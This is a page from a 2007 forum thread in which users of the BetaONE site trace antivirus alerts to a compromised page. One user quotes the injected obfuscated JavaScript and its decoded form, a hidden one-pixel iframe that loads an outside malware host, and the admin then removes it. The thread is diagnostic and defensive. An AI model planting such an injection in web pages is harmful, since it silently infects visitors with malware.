BetaONE will rise again!
Page 2 of 4 < 1 2 34 >
Show 40 post(s) from this thread on one page

BetaONE will rise again! (http:\\b1.hcanet.com\forum/index.php)
-   Chit Chat (http:\\b1.hcanet.com\forum/forumdisplay.php?f=25)
-   -   B1 Infected ! (http:\\b1.hcanet.com\forum/showthread.php?t=30228)

DoG 3rd Nov 07 10:38 PM
I'm seeing this problem now on Firefox- will scan the server and see what's happening.

Voodoo 6th Nov 07 01:49 PM
I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne. :o



Cheerz
Voodoo

Voodoo 8th Nov 07 05:44 PM
BUMP :o

Can an admin look at this. As stated, a shitload of other sites are also loaded when you come here. Cant be good.:confused:

Cheerz
Dave

DoG 8th Nov 07 10:29 PM
The server was scanned and cleaned earlier this week- afaik it's still clean but will check. Are you sure you havent been infected with spyware?

freezer121 9th Nov 07 07:54 AM
I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo! :)

Alpine 9th Nov 07 01:08 PM
i am clean on the 2 pcs i use to come over b1 ! Both are still giving me this virus !!

ill do another check on my pc right now !

DoG 9th Nov 07 10:16 PM
I scanned the server last night with KAV and Trend House Call but all was clean......

Cactus 11th Nov 07 08:47 PM
DoG,

Now don't tell me you really coudn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
  <title>BetaONE Hotfix</title>
</head>

<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
  <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>

</html>
The Javascript code (unescaped) is
Code:
<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'
That page (after some more site switching) eventualy leaves you infected with what Symantec call's Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after witch it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on ;)

Oh, and I saw today is yout birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus

DoG 12th Nov 07 06:14 PM
I removed the erroneus script when i realised that it never used to be part of the hotfix page- then i saw your post and felt much happier :)
Hows's it going Cactus? Thanks for the Birthday wishes :)

Voodoo 12th Nov 07 07:38 PM
Quote:
Originally Posted by DoG (Post 97471)
I removed the erroneus script when i realised that it never used to be part of the hotfix page-
Hi there Mike. All the other sites are still loading on my side? :eek: Tried Firefox as well as Opera.

Cheerz
Dave


All times are GMT +1. The time now is 10:57 AM.
Page 2 of 4 < 1 2 34 >
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.6.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.